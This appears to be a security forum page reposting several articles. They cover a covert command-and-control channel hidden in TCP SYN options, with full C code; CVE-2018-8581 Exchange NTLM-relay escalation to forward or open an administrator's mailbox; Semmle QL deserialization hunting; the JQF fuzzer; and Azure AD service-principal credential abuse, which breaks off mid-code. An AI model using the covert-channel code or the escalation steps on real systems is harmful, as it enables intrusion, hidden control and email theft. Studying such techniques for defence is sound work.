Command and Control via TCP Handshake thesw4rm Cybersecurity Stuff 2019-09-15 (Updated: 2019-09-15) C2, Linux, NFQueue, Netfilter, TCP Quick Intro/Disclaimer This is my first blog post, so please let me know if there’s any way I can improve this post. I expect it to have inaccuracies and maybe have parts that can be explained better. Would appreciate a quick note if any of you notice them! So, all that BS aside, let’s get into it. Quick disclaimer: the method presented here probably doesn’t have as much use or application in a real red teaming scenario. The main reason: you need to have root on the victim machine at some point for it to even work, although after having it one time you can configure the victim system so it is not necessary again. I wrote this as primarily because I though it was a cool and creative way to exfiltrate or infiltrate data with hilarious stealth. Background Command and control is pretty widely known across the security world. You set up a listener on a victim machine and send commands to it that it then executes, hopefully with root. People have a lot of creative ways to hide the commands that are sent: Cobalt Strike uses timed delays with its beacons, Wireguard can be used to encrypt data while being transferred, etc. However, the problem with all these approaches is that anyone (or anything) that’s monitoring data transfer at the right time and place has the potential to catch these threats. However, who the hell looks so closely at SYN packets? Initial Info If you know the structure of an IPV4 or TCP packet or are OK with checking back to see what part of the packet I’m talking about, skip ahead. IPV4 packets are structured as shown in this image TCP packets are structured as shown in this image. Not much space to hide any data. That makes perfect sense because handshake packets are meant to establish a connection and define parameters for it, not send data themselves. Much of the packet is pre-defined or will cause problems with the connection if changed, like port, flags, etc. The sequence number can encode 4 bytes of data at a time to infiltrate data, but this isn’t good enough. 4 bytes per second might be acceptable for RCE to a server on the Moon in 1969 but we need something that can at least carry the equivalent of a full sentence in English. Meet: the options field. TCP Options are absolutely vital in modern day connections. They are what define how data will be transferred from one endpoint to the other. The entire size of a TCP handshake must be at maximum 60 bytes. Thus, there’s a whopping 40 bytes of space available in TCP options. Ten times more than what we just saw! We will actually able to go beyond this in the test environment and the packet will still be accepted. Through research online, I found that the 40 bytes limit is for packets that need to be legit. In practice, an extra long TCP options portion will only be truncated if the packet is re-segmented when it goes through one of its hops. The firewall will (I assume) need to have this 20 byte limit hardcoded and ignore the total length portion of the IPV4 header to truncate all the values. However, for the purpose of this experiment we are gonna assume that doesn’t happen and the packet is sent through as it is. In order to add options to the TCP packet, we need to update the “Data Offset” portion which lists the number of 32 bit words in the packet. The TCP packet is 5 words (20 bytes / 32 bits or 4 bytes = 5) and the Data Offset portion is 2 bits, leaving us 251 words to work with: a THICC 1KB of data that could go in the options. More than enough for a couple of commands. In addition, although we won’t mess with this in the experimental setup, there is an experimental option that IANA has acknowledged that lets you extend the Data Offset portion by even more. Here’s a link for those that want to read more into it. NFQueue Netfilter created a plugin called NFQueue for IPtables to bridge the gap between intercepting packets on the kernel and being able to modify and read them from your own program from userspace. It relies on the libnetfilter_queue library and (initially) root access which sucks, but it won’t stop us. For now, everything will be done through root, but for future work any user with CAP_NET_ADMIN capabilities on the victim can perform this attack as well. Back to the topic at hand, NFQueue copies packets from kernel space to userspace for anyone with privileges to mess with them then give a verdict. This verdict could be your everyday ACCEPT, REJECT, DROP, or one of the special NF_REPEAT or NF_QUEUE which either reinserts the modified packet back into the queue or sends it to a different NFQueue listener. Enough talk. Time to code. Building the test environment The test environment I setup is two Ubuntu 18.04 LTS server VMs each with libnetfilter-queue-dev dependencies installed where I refer to one as the listener, the victim machine, and the controller, the attacking machine. Writing the code I will be going over how the code actually works. If you just wanna see Wireshark pictures and the result, skip ahead to the screenshots. Some stupid college kid boiled some plates NFQueue needs a big chunk of boilerplate code to get started. Noone wants to write all that code themselves, so neither will we. The boilerplate I have made for us is a heavily modified version of the Hello World found here. Initial commit for the controller can be found here Initial commit for the listener can be found here Breaking down the boilerplate Lots of code here, let’s go over it real quick. tcp_pkt_struct.h 1 2 3 4 5 6 #pragma pack(push, 1) typedef struct { struct iphdr ipv4_header; struct tcphdr tcp_header; } full_tcp_pkt_t; #pragma pack(pop) This is what we will use to modify packet headers. NFqueue just gives us a void array of bytes, it’s up to us to figure out what to do with. Notice struct iphdr and struct tcphdr are directly from the Linux networking library. main.c We will treat three functions as a black box (we know what they do but not how they do it). Mostly because I found them on Google and actually have no idea how they work. 1 2 3 long ipcsum(unsigned char *buf, int length); void tcpsum(struct iphdr *pIph, unsigned short *ipPayload); void rev( void *start, int size); ipcsum and tcpsum calculate the checksum of an IPV4 and TCP packet. rev reverses the bytes starting at the passed in pointer for size number of bytes. so 01 02 03 will become 03 02 01. We will use this to fight the battle against different endians for network byte order and Linux byte order. Now let’s look at the non-blackbox functions. 1 2 3 int main(); static int cb(struct nfq_q_handle *qh, struct nfgenmsg *nfmsg, struct nfq_data *nfa, ...); static void modify_handshk_pkt(full_tcp_pkt_t *pkt, int pkt_len); The main functions loads packets from the sk_buff and writes them into a statically allocated 4098 byte buffer. 4098 is overkill for SYN packets. Change it if you want. You don’t have to for experimental purposes. The cb is the callback that handles each packet as it enters sk_buff and modify_handshk_pkt will modify or read the packet as needed. Plan of attack Let’s take a look at a SYN packet in Wireshark to see what we are working with. I ran a simple web server on port 8000 on the listener 1 python3 -m http.server & Curl the server from the controller Let’s look at what wireshark shows (filtered for just SYN packets) Analysis The portion that is highlighted in white, `02 04 05 b4` is where the TCP options start. TCP options are placed one after another in the format "Option-Kind: 1 byte - Option-Length: 1 byte - Option-value: value of length - 2 bytes". The option length defines the length for ALL bytes in the option, including the byte used for the kind and length itself. In this case, `02` represents the Maximum Segment Size, has a length of `04`, and a value of `05b4`. Notice Header Length: 40 bytes further up in Wireshark’s description of the packet. This is a converted form of the Data Offset field. So in order to add options at the end, we will need to update the Total Length in the IPV4 packet (look back if you don’t remember) and the Data Offset with as many 4 bit words as are in our options. This also means that the total length of everything we add to the packet has to be a multiple of 4 (you can’t have a fractional Data Offset). We can pad the packet with 01 or No-OP for this purpose. The Storm of Code - Controller The legit way to add extra data to the TCP packet would be to use an experimental option. However, we want to hide, so let’s use an option that will be very common, like User Timeout (0x1c or 28). IANA has a list of option assignments on their page. So let’s add to the code. tcp_pkt_struct.h Insert code at the top 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 #define METADATA_SIZE 16 #pragma pack(push, 1) typedef struct { uint16_t padding; uint8_t opt; uint8_t len; uint32_t payload; uint32_t payload_2; uint32_t payload_3; } pkt_meta; #pragma pack(pop) ... The option has a kind, a length, and a payload which is a string we will write to a file on the victim. The padding at the beginning is to keep the total length divisible by 4. Because the data will directly be appended to the packet, we cannot use an array and need to split the payload into chunks of 4 bytes. main.c 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 static void modify_handshk_pkt(full_tcp_pkt_t *pkt, int pkt_len) { /* Should match only SYN packets */ printf("\nPacket intercepted: \n"); if (pkt->tcp_header.syn == 1 && pkt->tcp_header.ack == 0) { printf("\tPacket type: SYN\n"); pkt_meta *metadata = (pkt_meta *)((unsigned char *)pkt + pkt_len); metadata->padding = 0x0101; metadata->opt = 0x1c; // Custom option kind. 28 = User Timeout metadata->len = METADATA_SIZE - sizeof(metadata->padding); // Custom option length. Default length of User timeout is different. pkt->tcp_header.doff += METADATA_SIZE / 4; // Change data offset } } We added in all the code relevant to the TCP packet. At the end, we change the data offset to reflect the additional options. Let’s move onto the callback where the packet is finally sent on its way. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 static int cb(struct nfq_q_handle *qh, struct nfgenmsg *nfmsg, struct nfq_data *nfa, void *data) { u_int32_t id; struct nfqnl_msg_packet_hdr *ph; ph = nfq_get_msg_packet_hdr(nfa); id = ntohl(ph->packet_id); printf("entering callback\n"); full_tcp_pkt_t *ipv4_payload = NULL; int pkt_len = nfq_get_payload(nfa, (unsigned char **) &ipv4_payload); modify_handshk_pkt(ipv4_payload, pkt_len); rev(&ipv4_payload->ipv4_header.tot_len, 2); ipv4_payload->ipv4_header.tot_len += METADATA_SIZE; rev(&ipv4_payload->ipv4_header.tot_len, 2); ipv4_payload->ipv4_header.check = 0; ipv4_payload->ipv4_header.check = ipcsum((unsigned char *)&ipv4_payload->ipv4_header, 20); rev(&ipv4_payload->ipv4_header.check, 2); // Convert between endians tcpcsum(&ipv4_payload->ipv4_header, (unsigned short *)&ipv4_payload->tcp_header); int ret = nfq_set_verdict(qh, id, NF_ACCEPT, (u_int32_t) pkt_len + METADATA_SIZE, (void *) ipv4_payload); printf("\n Set verdict status: %s\n", strerror(errno)); return ret; } We extend the total length of the IPv4 packet so the TCP packet doesn’t get truncated on its way to the destination. The Linux system I was using got confused between it’s preferred Little Endian and the network packet’s Big Endian, so I had to reverse the bytes first, add the length, and reverse the bytes again. This may not be the case for you guys. You can confirm it by seeing if the total length increases by 0x0010 bytes or by 0x1000 bytes. We then recalculate the IP and TCP checksum while reversing the bits as necessary. (Normally packets don’t need a valid TCP checksum but let’s put it there anyways). Fruit of labour Let’s see the result of our work. Make a build folder and build the entire project using CMake. Then upload to the controller. There’s an IPtables rule in iptables_rules.sh that intercepts SYN packets on port 8000 and sends them to queue 0. If nothing is listening on queue 0 then it simply sends the SYN on its way. Steps 1) Create build folder and build project 2) Upload build folder and iptables_rules.sh file to controller. 3) Run iptables_rules.sh as root on controller (only if the system was restarted or this is the first upload) 4) Run main in the build folder as root on controller 5) Start up Wireshark on listener filtering on packets on port 8000 to view the result (to make sure it was received) 6) Send HTTP request from controller to listener on port 8000 Controller Screenshot Controller Wireshark Awesome! The SYN packet in that whole HTTP request has our data added to the end. No kernel programming necessary. Notice that the User timeout is supposed to be 4 bytes and we set it to 14. If you want to be extra stealthy you can use multiple options and break your payload into their individual default lengths so there isn’t an anomaly. For this experiment, we don’t care. The Storm of Code- listener Cool we modified a packet from the controller. Big whoop. But now we have to do something with that payload. The code in the listener is the exact same for the boilerplate and tcp_pkt_struct.h so refer back if you forgot about them. Let’s go right into main.c. main.c 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 int write_to_file(unsigned char *payload, int len){ int output_fd; ssize_t ret_out; output_fd = open("virusfile.pup", O_WRONLY | O_CREAT, 0644); if(output_fd == -1){ perror("open virus file"); return 3; } ret_out = write(output_fd, payload, len); close(output_fd); return 0; } static void modify_handshk_pkt(full_tcp_pkt_t *pkt, int pkt_len) { /* Should match only SYN packets */ printf("\nPacket intercepted: \n"); if (pkt->tcp_header.syn == 1 && pkt->tcp_header.ack == 0) { printf("\tPacket type: SYN\n"); pkt_meta *metadata = (pkt_meta *)((unsigned char *)pkt + pkt_len - METADATA_SIZE); unsigned char *payload = (unsigned char *)(&metadata->payload); write_to_file(payload, METADATA_SIZE - (sizeof(metadata->padding) + sizeof(metadata->opt) + sizeof(metadata->len))); printf("RECEIVED PAYLOAD: %s", payload); pkt->tcp_header.doff -= METADATA_SIZE / 4; } } We basically do the opposite of what we did in the controller when reading the packet. The pointer for the metadata has to be after the original size of the packet, and instead of writing to the metadata we read from it. Then, we write the payload to a file and reduce the Data Offset back to the initial value. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 static int cb(struct nfq_q_handle *qh, struct nfgenmsg *nfmsg, struct nfq_data *nfa, void *data) { u_int32_t id; struct nfqnl_msg_packet_hdr *ph; ph = nfq_get_msg_packet_hdr(nfa); id = ntohl(ph->packet_id); printf("entering callback\n"); full_tcp_pkt_t *ipv4_payload = NULL; int pkt_len = nfq_get_payload(nfa, (unsigned char **) &ipv4_payload); modify_handshk_pkt(ipv4_payload, pkt_len); rev(&ipv4_payload->ipv4_header.tot_len, 2); ipv4_payload->ipv4_header.tot_len -= METADATA_SIZE; rev(&ipv4_payload->ipv4_header.tot_len, 2); ipv4_payload->ipv4_header.check = 0; ipv4_payload->ipv4_header.check = ipcsum((unsigned char *)&ipv4_payload->ipv4_header, 20); rev(&ipv4_payload->ipv4_header.check, 2); // Convert between endians tcpcsum(&ipv4_payload->ipv4_header, (unsigned short *)&ipv4_payload->tcp_header); int ret = nfq_set_verdict(qh, id, NF_ACCEPT, (u_int32_t) pkt_len - METADATA_SIZE, (void *) ipv4_payload); printf("\n Set verdict status: %s\n", strerror(errno)); return ret; } Again, just reversing what we did earlier by reducing total length, recalculating checksum, and truncating packet bytes sent out by libnetfilter_queue library. Proving it worked Let’s look at some screenshots to see that it worked. Steps to build: 1) Build the project like shown in controller 2) Note that iptables_rules.sh captures on PREROUTING and not POSTROUTING to intercept packets coming into the system. Upload and run iptables scripts as shown in controller. 3) Use iptables_clean.sh if you mess up (note that it flushes a ton of rules because I’m lazy) or remove the rule manually and try again. 4) Run the server executable in build directory on the listener Listener packet interception Cool! We intercepted the SYN packet coming in, and received the payload. Let’s make sure we could write it to a file (you can do anything you want with the payload once you have it). Listener file contents And there you go. Payload was intercepted, packet was truncated (although I couldn’t find a screenshot to prove that, you can see for yourself if you run it), and noone is the wiser. The firewall doesn’t have the resources to read the options of every single SYN packet coming in, especially when it’s a large scale environment with lots of inbounds connections, and the endpoint is none the wiser. Conclusions This is just a Hello World example of what can be done with NFQueue from a red teaming perspective during post-exploitation. The easiest way to hide something in network traffic is to hide in numbers, and we have done just that. There isn’t anything more common than an incoming SYN packet to a server. However, this method does require root privileges on the victim system or CAP_NET_ADMIN capabilities for a compromised user. Additionally, the libnetfilter_queue dependency must be installed on the victim, meaning that for now this method will only work on systems with netfilter and the NFQueue extension installed (so far I could only find it working on Linux). It can also work on BSD systems using divert sockets but I have not tried that, although as per documentation there are similar limitations as to the Linux method. I plan to find a way to hide the payload better within TCP options by researching more into default lengths and commonly used option kinds. Additionally, I’m trying to construct an environment where the TCP packet is re-segmented and possibly truncated if the handshake packet is more than 60 bytes. Future learning This is my first time making a blog post. Please contact me at thesw4rm@pm.me if you want to discuss anything tech based with me. Definitely please let me know of anything that can be improved, if this method is actually applicable in a real engagement, or anyway I can improve it so it becomes that way. Peace guys! Sursa: https://thesw4rm.gitlab.io/nfqueue_c2/2019/09/15/Command-and-Control-via-TCP-Handshake/
-
Microsoft Exchange – Privilege Escalation September 16, 2019 Administrator Red Team CVE-2018-8581, Microsoft Exchange, NTLM Relay, Privilege Escalation, PushSubscription Leave a comment Harvesting the credentials of a domain user during a red team operation can lead to execution of arbitrary code, persistence and domain escalation. However information that is stored over emails can be highly sensitive for an organisation and therefore threat actors focus can be to exfiltrate data from emails. This can be achieved either by adding a rule to the mailbox of a target user that will forward emails to an inbox that the attacker controls or by delegating access of a mailbox to their Exchange account. Dustin Childs from Zero Day Initiative discovered a vulnerability in Microsoft Exchange that could allow an attacker to impersonate a target account. This vulnerability exist because by design Microsoft Exchange allows any user to specify a URL for Push Subscription and Exchange will send notifications to this URL. NTLM hashes are also leaked and can be used to authenticate with Exchange Web Services via NTLM relay with the leaked NTLM hash. The technical details of the vulnerability has been covered into the Zero Day Initiative blog. Email Forwarding Accessing the compromised account from Outlook Web Access (OWA) portal and selecting the permissions of the inbox folder will open a new window that will contain the permissions of the mailbox. Inbox Permissions The target account should be added to have permissions over the mailbox. This is required in order to retrieve the SID (Security Identifier) of the account. Add Permissions for the Target Account Opening the Network console in the browser and browsing a mailbox folder will generate a request that will be sent to the Microsoft Exchange server. POST Request to Microsoft Exchange Examining the HTTP Response of the request will unveil the SID of the Administrator account. Administrator SID The implementation of this attack requires two python scripts from the Zero Day Initiative GitHub repository. The serverHTTP_relayNTLM.py script requires the SID of the Administrator that has been retrieved, the IP address of the Exchange with the target port and the email account that has been compromised and is in control of the red team. Configuration serverHTTP_relayNTLM script Once the script has the correct values it can be executed in order to start a relay server. 1 python serverHTTP_relayNTLM.py Relay Server The Exch_EWS_pushSubscribe.py requires the domain credentials and the domain of the compromised account and the IP address of the relay server. Push Subscribe Script Configuration Executing the python script will attempt to send the pushSubscribe requests to the Exchange via EWS (Exchange Web Services). 1 python Exch_EWS_pushSubscribe.py pushSubscribe python script Exchange Response XML Reponse The NTLM hash of the Administrator will be relayed back to the Microsoft Exchange server. Relay Administrator NTLM Relay Administrator NTLM to Exchange Emails tha will be sent to the mailbox of the target account (Administrator) will be forwarded automatically to the mailbox that is under the control of the red team. Email to target account The email will be forwarded at the inbox of the account that the Red Team controls. Email forwarded automatically A rule has been created to the target account by using NTLM relay to authenticate with the Exchange that will forward all the email messages to another inbox. This can be validated by checking the Inbox rules of the target account. Rule – Forward Admin Emails Delegate Access Microsoft Exchange users can connect their account (Outlook or OWA) to other mailboxes (delegate access) if they have the necessary permissions assigned. Attempting to open directly a mailbox of another account withouth permissions will produce the following error. Open Another Mailbox – No Permissions There is a python script which is exploiting the same vulnerability but instead of adding a forwarding rule is assigning permissions to the account to access any mailbox in the domain including domain administrator. The script requires valid credentials, the IP address of the Exchange server and the target email account. Script Configuration Executing the python script will attempt to perform the elevation. 1 python2 CVE-2018-8581.py Privilege Escalation Script Once the script is finished a message will appear that will inform the user that the mailbox of the target account can be displayed via Outlook or Outlook Web Access portal. Privilege Escalation Script – Delegation Complete Authentication with Outlook Web Access is needed in order to be able to view the delegated mailbox. Outlook Web Access Authentication Outlook Web Access has a functionality which allows an Exchange user to open the mailbox of another account if he has permissions. Open Another Mailbox The following Window will appear on the screen. Open Another Mailbox Window The mailbox of the Administrator will open in another tab to confirm the elevation of privileges. References https://www.zerodayinitiative.com/blog/2018/12/19/an-insincere-form-of-flattery-impersonating-users-on-microsoft-exchange https://github.com/thezdi/PoC/tree/master/CVE-2018-8581 https://github.com/WyAtu/CVE-2018-8581 Sursa: https://pentestlab.blog/2019/09/16/microsoft-exchange-privilege-escalation/
-
Finding Insecure Deserialization in Java By: Semmle Team September 12, 2019 Video Transcription Last year, one of our security researchers Mo discovered an unsafe deserialization vulnerability in Apache Struts. It turned out to allow a remote code execution and and it was also part of the default configuration for struts so this was a pretty high impact vulnerability. Today, I'm going to show you how to find unsafe deserialization vulnerabilities using QL. You can see here that I've got a copy of QL for eclipse. I have a snapshot of struts from August last year which includes the vulnerability loaded up and I'm going to walk you through the process of finding that vulnerability with QL. To start, I'm just going to look for all of the places in a code where we we potentially perform deserialization and I'm interested in calls where the thing that's being called has the name fromXML. We've got two results here and we can jump to the source code in the snapshot to see that these are both calls to fromXML. Now, this is not necessarily enough for these to be vulnerable. In addition to just doing the deserialization, the user has to be able to control the value that's being passed into from XML. This is a pretty typical type of problem. When you're doing variant analysis, you have some value that is potentially user controlled and you want to know if it reaches a dangerous operation. Semmle provides a library that will allow you to do a dataflow analysis. I've just pulled that in with these imports here and that's what I'm going to use to try and decide for each of these fromxml calls is this is this something that's really vulnerable or are they okay. The first thing I need to do is is define a data flow configuration that tells us what are the sources that the user might be able to control and what are the sinks - in this case, the arguments to fromXML. There's a little bit of boilerplate here while I set this up. Then the kind of the information I need to provide here is what are the sources, so this is how I do that. And we're going to say something is a source if it's a kind of RemoteFlowSource. This is a class that's provided by Semmle, it covers a lot of your standard ways that that an end user can control a value in a java application. This includes things like all of the web server annotations and these sorts of things that you'll be familiar with. Of course, if you want to add your own or customize that then you can you can put whatever you want in here. Now I'm going to do the same for the sinks. We said earlier that the sinks are gonna be anything that gets passed into fromXML is potentially dangerous. Say something is a sink if there is a call fromXML and one of the arguments to that call is our sink. I've written my configuration and now I can go ahead and actually use that in the query. What I'm going do here is get the flow config and the node source and a path node that is the sink. The only kind of condition I'm going to impose on these is that under the configuration that I gave, there is a flow from the source to the sink. Then I'm going to return the source and that says when the user clicks on this result, where should we send them. I'm additionally going to give the source and the sink and this tells us to kind of provide a bit of context for this result, show how data gets between these two things, and finally a message to display. I can now run that. Okay, that's finished and we've got two results here. You can see the first one is in test code so I'll skip over that and we can take a look at the second result here. This is going to be the source as you can see request as an HTTP servlet request and and the input stream and that is something that's likely to be user controlled. Up here on the right, we've got this path Explorer. This actually shows us all of the steps that we go through to get from this source to the sink which is going to be the argument to fromXML. We start with the input stream here, you can see it gets wrapped in a reader there and then it's passed into this toObject method. We move to the next stage, here we've got the parameter toObject on XStream handler and again going back we can see that handler is a is a content type handler. If you can send a request which is going to be handled by the XStream handler, then you can pass whatever data you want into this fromXML method and that will allow you to get remote code execution with an appropriately crafted request. So that shows you how to write a simple query that will find vulnerabilities like this. You can see that it's easy to modify if you have your own sources. Maybe you've got a custom web server something like that or if you want to customize the sinks as well looking for other types of deserialization it's easy to do that as well. You can tweak this even further adding things like barriers for sanitization and things like that to really customize this as much as you want and make sure it gives you great results. Sursa: https://blog.semmle.com/insecure-deserialization-java/
-
JQF + Zest: Semantic Fuzzing for Java JQF is a feedback-directed fuzz testing platform for Java, which uses the abstraction of property-based testing. JQF is built on top of junit-quickcheck: a tool for generating random arguments for parametric Junit test methods. JQF enables better input generation using coverage-guided fuzzing algorithms such as Zest. Zest is an algorithm that biases coverage-guided fuzzing towards producing semantically valid inputs; that is, inputs that satisfy structural and semantic properties while maximizing code coverage. Zest's goal is to find deep semantic bugs that cannot be found by conventional fuzzing tools, which mostly stress error-handling logic only. By default, JQF runs Zest via the simple command: mvn jqf:fuzz. JQF is a modular framework, supporting the following pluggable fuzzing front-ends called guidances: Binary fuzzing with AFL (tutorial) Semantic fuzzing with Zest [ISSTA'19 paper] (tutorial 1) (tutorial 2) Complexity fuzzing with PerfFuzz [ISSTA'18 paper] JQF has been successful in discovering a number of bugs in widely used open-source software such as OpenJDK, Apache Maven and the Google Closure Compiler. Zest Research Paper To reference Zest in your research, we request you to cite our ISSTA'19 paper: Rohan Padhye, Caroline Lemieux, Koushik Sen, Mike Papadakis, and Yves Le Traon. 2019. Semantic Fuzzing with Zest. In Proceedings of the 28th ACM SIGSOFT International Symposium on Software Testing and Analysis (ISSTA’19), July 15–19, 2019, Beijing, China. ACM, New York, NY, USA, 12 pages. https://doi.org/10.1145/3293882.3330576 JQF Tool Paper If you are using the JQF framework to build new fuzzers, we request you to cite our ISSTA'19 tool paper as follows: Rohan Padhye, Caroline Lemieux, and Koushik Sen. 2019. JQF: Coverage-Guided Property-Based Testing in Java. In Proceedings of the 28th ACM SIGSOFT International Symposium on Software Testing and Analysis (ISSTA ’19), July 15–19, 2019, Beijing, China. ACM, New York, NY, USA, 4 pages. https://doi.org/10.1145/3293882.3339002 Overview What is structured fuzzing? Binary fuzzing tools like AFL and libFuzzer treat the input as a sequence of bytes. If the test program expects highly structured inputs, such as XML documents or JavaScript programs, then mutating byte-arrays often results in syntactically invalid inputs; the core of the test program remains untested. Structured fuzzing tools leverage domain-specific knowledge of the input format to produce inputs that are syntactically valid by construction. Here is a nice article on structure-aware fuzzing of C++ programs using libFuzzer. What is generator-based fuzzing (QuickCheck)? Structured fuzzing tools need a way to understand the input structure. Some other tools use declarative specifications of the input format such as context-free grammars or protocol buffers. JQF uses QuickCheck's imperative approach for specifying the space of inputs: arbitrary generator programs whose job is to generate a single random input. A Generator<T> provides a method for producing random instances of type T. For example, a generator for type Calendar returns randomly-generated Calendar objects. One can easily write generators for more complex types, such as XML documents, JavaScript programs, JVM class files, SQL queries, HTTP requests, and many more -- this is generator-based fuzzing. However, simply sampling random inputs of type T is not usually very effective, since the generator does not know if the inputs that it produces are any good. What is semantic fuzzing (Zest)? JQF supports the Zest algorithm, which uses code-coverage and input-validity feedback to bias a QuickCheck-style generator towards generating structured inputs that can reveal deep semantic bugs. JQF extracts code coverage using bytecode instrumentation, and input validity using JUnit's Assume API. An input is valid if no assumptions are violated. Documentation Tutorials Zest 101: A basic tutorial for fuzzing a standalone toy program using command-line scripts. Walks through the process of writing a test driver and structured input generator for Calendar objects. Fuzzing a compiler with Zest: A tutorial for fuzzing a non-trivial program -- the Google Closure Compiler -- using a generator for JavaScript programs. This tutorial makes use of the JQF Maven plugin. Fuzzing with AFL: A tutorial for fuzzing a Java program that parses binary data, such as PNG image files, using the AFL binary fuzzing engine. Fuzzing with ZestCLI: A tutorial of fuzzing a Java program with ZestCLI Continuous Fuzzing Just like unit-tests fuzzing is advised to be run continuously with your CI as your code grows and developed. Currently there is 1 service that offer continuous fuzzing as a service based on JQF/Zest: fuzzit.dev (tutorial) Additional Details The JQF wiki contains lots more documentation including: Using a custom fuzz guidance Performance Benchmarks JQF also publishes its API docs. Contact the developers We want your feedback! (haha, get it? get it?) If you've found a bug in JQF or are having trouble getting JQF to work, please open an issue on the issue tracker. You can also use this platform to post feature requests. If it's some sort of fuzzing emergency you can always send an email to the main developer: Rohan Padhye. Trophies If you find bugs with JQF and you comfortable with sharing, We would be happy to add them to this list. Please send a PR for README.md with a link to the bug/cve you found. google/closure-compiler#2842: IllegalStateException in VarCheck: Unexpected variable google/closure-compiler#2843: NullPointerException when using Arrow Functions in dead code google/closure-compiler#3173: Algorithmic complexity / performance issue on fuzzed input google/closure-compiler#3220: ExpressionDecomposer throws IllegalStateException: Object method calls can not be decomposed JDK-8190332: PngReader throws NegativeArraySizeException when width is too large JDK-8190511: PngReader throws OutOfMemoryError for very small malformed PNGs JDK-8190512: PngReader throws undocumented IllegalArgumentException: "Empty Region" instead of IOException for malformed images with negative dimensions JDK-8190997: PngReader throws NullPointerException when PLTE section is missing JDK-8191023: PngReader throws NegativeArraySizeException in parse_tEXt_chunk when keyword length exceeeds chunk size JDK-8191076: PngReader throws NegativeArraySizeException in parse_zTXt_chunk when keyword length exceeds chunk size JDK-8191109: PngReader throws NegativeArraySizeException in parse_iCCP_chunk when keyword length exceeds chunk size JDK-8191174: PngReader throws undocumented llegalArgumentException with message "Pixel stride times width must be <= scanline stride" JDK-8191073: JpegImageReader throws IndexOutOfBoundsException when reading malformed header JDK-8193444: SimpleDateFormat throws ArrayIndexOutOfBoundsException when format contains long sequences of unicode characters JDK-8193877: DateTimeFormatterBuilder throws ClassCastException when using padding mozilla/rhino#405: FAILED ASSERTION due to malformed destructuring syntax mozilla/rhino#406: ClassCastException when compiling malformed destructuring expression mozilla/rhino#407: java.lang.VerifyError in bytecode produced by CodeGen mozilla/rhino#409: ArrayIndexOutOfBoundsException when parsing '<!-' mozilla/rhino#410: NullPointerException in BodyCodeGen COLLECTIONS-714: PatriciaTrie ignores trailing null characters in keys COMPRESS-424: BZip2CompressorInputStream throws ArrayIndexOutOfBoundsException(s) when decompressing malformed input LANG-1385: StringIndexOutOfBoundsException in NumberUtils.createNumber CVE-2018-11771: Infinite Loop in Commons-Compress ZipArchiveInputStream (found by Tobias Ospelt) MNG-6375 / plexus-utils#34: NullPointerException when pom.xml has incomplete XML tag MNG-6374 / plexus-utils#35: ModelBuilder hangs with malformed pom.xml MNG-6577 / plexus-utils#57: Uncaught IllegalArgumentException when parsing unicode entity ref Bug 62655: Augment task: IllegalStateException when "id" attribute is missing BCEL-303: AssertionViolatedException in Pass 3A Verification of invoke instructions BCEL-307: ClassFormatException thrown in Pass 3A verification BCEL-308: NullPointerException in Verifier Pass 3A BCEL-309: NegativeArraySizeException when Code attribute length is negative BCEL-310: ArrayIndexOutOfBounds in Verifier Pass 3A BCEL-311: ClassCastException in Verifier Pass 2 BCEL-312: AssertionViolation: INTERNAL ERROR Please adapt StringRepresentation to deal with ConstantPackage in Verifier Pass 2 BCEL-313: ClassFormatException: Invalid signature: Ljava/lang/String)V in Verifier Pass 3A CVE-2018-8036: Infinite Loop leading to OOM in PDFBox's AFMParser (found by Tobias Ospelt) PDFBOX-4333: ClassCastException when loading PDF (found by Robin Schimpf) PDFBOX-4338: ArrayIndexOutOfBoundsException in COSParser (found by Robin Schimpf) PDFBOX-4339: NullPointerException in COSParser (found by Robin Schimpf) CVE-2018-8017: Infinite Loop in IptcAnpaParser CVE-2018-12418: Infinite Loop in junrar (found by Tobias Ospelt) Sursa: https://github.com/rohanpadhye/jqf
-
Azure AD privilege escalation - Taking over default application permissions as Application Admin 5 minute read During both my DEF CON and Troopers talks I mentioned a vulnerability that existed in Azure AD where an Application Admin or a compromised On-Premise Sync Account could escalate privileges by assigning credentials to applications. When revisiting this topic I found out the vulnerability was actually not fixed by Microsoft, and that there are still methods to escalate privileges using default Office 365 applications. In this blog I explain the why and how. The escalation is still possible since this behaviour is considered to be “by-design” and thus remains a risk. Applications and Service Principals In Azure AD there is a distinction between Applications and Service Principals. An application is the configuration of an application, whereas the Service Principal is the security object that can actually have privileges in the Azure Directory. This can be quite confusing as in the documentation they are usually both called applications. The Azure portal makes it even more confusing by calling Service Principals “Enterprise Applications” and hiding most properties of the service principals from view. For Office 365 and other Microsoft applications, the Application definition is present in one of Microsoft’s dedicated Azure directories. In an Office 365 tenant, service principals are created for these applications automatically, giving an Office 365 Azure AD about 200 service principals by default that all have different pre-assigned permissions. Application roles The way Azure AD applications work is that they can define roles, which can then be assigned to users, groups or service principals. If you read the documentation for the Microsoft Graph permissions you can see permissions such as Directory.Read.All. These are actually roles defined in the Microsoft Graph application, which can be assigned to service principals. In the documentation and Azure Portal, these roles are called “Application permissions”, but we’re sticking to the API terminology here. The roles defined in the Microsoft graph application can be queried using the AzureAD PowerShell module: When we try to query for applications that have been assigned one or more roles, we can see that in my test directory the appadmintest app has a few roles assigned (though it’s not exactly clear what roles that are since there’s a lot of GUID references): There is however no way to query within an Azure AD which roles have been assigned to default Microsoft applications. So to enumerate this we have to get a bit creative. An Application Administrator (or the On-premise Sync account if you are escalating from on-premise to the cloud) can assign credentials to an application, after which this application can log in using the client credential grant OAuth2 flow. Assigning credentials is possible using PowerShell: PS C:\> $sp = Get-AzureADServicePrincipal -searchstring "Microsoft StaffHub" PS C:\> New-AzureADServicePrincipalPasswordCredential -objectid $sp.ObjectId -EndDate "31-12-2099 12:00:00" -StartDate "6-8-2018 13:37:00" -Value redactedpassword CustomKeyIdentifier : EndDate : 31-12-2099 12:00:00 KeyId : StartDate : 6-8-2018 13:37:00 Value : redactedpassword After which we can log in using some python code and have a look at the issued access token. This JWT displays the roles the application has in the Microsoft Graph: import requests import json import jwt import pprint # This should include the tenant name/id AUTHORITY_URL = 'https://login.microsoftonline.com/ericsengines.onmicrosoft.com' TOKEN_ENDPOINT = '/oauth2/token' data = 